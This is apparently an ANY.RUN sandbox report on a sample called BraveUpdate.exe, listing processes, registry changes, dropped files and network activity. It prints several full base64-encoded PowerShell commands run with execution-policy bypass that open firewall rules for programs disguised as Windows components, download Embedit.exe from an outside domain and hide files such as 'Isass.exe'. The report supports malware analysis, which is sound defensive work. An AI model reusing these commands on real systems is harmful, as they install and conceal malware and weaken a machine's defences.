l\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294770688
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
392powershell.exe -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFUARABQACkAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFUARABQACkAIgAgAC0ARwByAG8AdQBwACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFUARABQACkAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAB0AHIAYQBmAGYAbQBvAG4AZQB0AGkAegBlAHIAXABhAHAAcABcAFQAZQB4AHQAbABuAHAAdQB0AEgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIATQBlAGQAaQBhACAAQwBlAG4AdABlAHIAIABFAHgAdABlAG4AZABlAHIAIAAtACAASABUAFQAUABTACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFUARABQACkAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQAFMAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVQBEAFAAKQAiACAALQBHAHIAbwB1AHAAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAUwAgAFMAdAByAGUAYQBtAGkAbgBnACAAKABVAEQAUAApACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAdAByAGEAZgBmAG0AbwBuAGUAdABpAHoAZQByAFwAYQBwAHAAXABUAGUAeAB0AGwAbgBwAHUAdABIAG8AcwB0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABPAHUAdABiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
848"C:\Windows\system32\chcp.com" 1252C:\Windows\System32\chcp.compowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Change CodePage Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\chcp.com
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1232"C:\Windows\system32\chcp.com" 1252C:\Windows\System32\chcp.compowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Change CodePage Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\chcp.com
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1236powershell.exe -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgAkAHAAYQBnAGUAZgBpAGwAZQAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AQwBvAG0AcAB1AHQAZQByAFMAeQBzAHQAZQBtACAALQBFAG4AYQBiAGwAZQBBAGwAbABQAHIAaQB2AGkAbABlAGcAZQBzAAoAJABwAGEAZwBlAGYAaQBsAGUALgBBAHUAdABvAG0AYQB0AGkAYwBNAGEAbgBhAGcAZQBkAFAAYQBnAGUAZgBpAGwAZQAgAD0AIAAkAGYAYQBsAHMAZQAKACQAcABhAGcAZQBmAGkAbABlAC4AcAB1AHQAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKAAoAJABwAGEAZwBlAGYAaQBsAGUAcwBlAHQAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAHAAYQBnAGUAZgBpAGwAZQBzAGUAdAB0AGkAbgBnAAoAJABwAGEAZwBlAGYAaQBsAGUAcwBlAHQALgBJAG4AaQB0AGkAYQBsAFMAaQB6AGUAIAA9ACAANAAwADkANgAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4ATQBhAHgAaQBtAHUAbQBTAGkAegBlACAAPQAgADIAMAA0ADgAMAAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4AUAB1AHQAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1340"C:\Windows\system32\chcp.com" 1252C:\Windows\System32\chcp.compowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Change CodePage Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\chcp.com
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1604powershell.exe -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAUgB1AG4AdABpAG0AZQBCAHIAbwBvAGsAZQByAC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABTAHUAYgBuAGUAdAB3AG8AcgBrACAAQwBvAG4AdAByAG8AbAAgAEMAZQBuAHQAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFMAdQBiAG4AZQB0AHcAbwByAGsAIABDAG8AbgB0AHIAbwBsACAAQwBlAG4AdABlAHIAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIABDAGUAbgB0AGUAcgAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABSAHUAbgB0AGkAbQBlAEIAcgBvAG8AawBlAHIALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVABDAFAAKQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVABDAFAAKQAiACAALQBHAHIAbwB1AHAAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVABDAFAAKQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABSAHUAbgB0AGkAbQBlAEIAcgBvAG8AawBlAHIALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIATQBlAGQAaQBhACAAQwBlAG4AdABlAHIAIABFAHgAdABlAG4AZABlAHIAIAAtACAASABUAFQAUABTACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFQAQwBQACkAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQAFMAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVABDAFAAKQAiACAALQBHAHIAbwB1AHAAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAUwAgAFMAdAByAGUAYQBtAGkAbgBnACAAKABUAEMAUAApACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAFIAdQBuAHQAaQBtAGUAQgByAG8AbwBrAGUAcgAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1608powershell.exe -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQB7AH0ACgBlAGwAcwBlACAAewAKAAkASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQBzAC4AZgByAGUAZQBzAG8AZgB0AHAAbABhAGMAZQAuAGMAbwBtAC8ARQBtAGIAZQBkAGkAdAAuAGUAeABlACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBlAGQAaQB0AC4AZQB4AGUAIgAKAH0ACgAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAEkAcwBhAHMAcwAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAEkAcwBhAHMAcwAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1644"C:\Windows\system32\chcp.com" 1252C:\Windows\System32\chcp.compowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Change CodePage Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\chcp.com
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1696"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass "" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
40 986
Read events
40 761
Write events
225
Delete events
0

Modification events

(PID) Process:(3692) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3692) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3692) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3692) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(3692) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
Operation:writeName:ExecutionPolicy
Value:
Bypass
(PID) Process:(1696) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3276) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3276) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3276) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3276) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
0
Suspicious files
41
Text files
1
Unknown types
4

Dropped files

PID
Process
Filename
Type
2472BraveUpdate.exeC:\Users\admin\AppData\Local\Temp\2472XHL9.battext
MD5:2DB454E02E120BF7904B4A12C938B060
SHA256:11C26CF81AECF89A4E4015FF9115492A51F51C8C2D97BDC7D11519D7C244746B
1696powershell.exeC:\Users\admin\AppData\Local\Temp\05bc4los.4rn.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3692powershell.exeC:\Users\admin\AppData\Local\Temp\xfgnewlk.ftq.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3692powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
2156powershell.exeC:\Users\admin\AppData\Local\Temp\ywd4kwiw.a0c.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3692powershell.exeC:\Users\admin\AppData\Local\Temp\svyenv3a.n5h.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1696powershell.exeC:\Users\admin\AppData\Local\Temp\eoo35fx0.nug.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1696powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF17f954.TMPbinary
MD5:0268C3470C936E6FBAC2945B9E1C2099
SHA256:DF2AF58E8879B48826D8A418ED3B02CC8D484BCFC231C5B7A11BD153ED3998E9
2780powershell.exeC:\Users\admin\AppData\Local\Temp\fz4jenfn.3eq.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2900powershell.exeC:\Users\admin\AppData\Local\Temp\qh44jnyn.zta.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
4
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
1080
svchost.exe
224.0.0.252:5355
unknown

DNS requests

Domain
IP
Reputation
files.freesoftplace.com
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
BraveUpdate.exe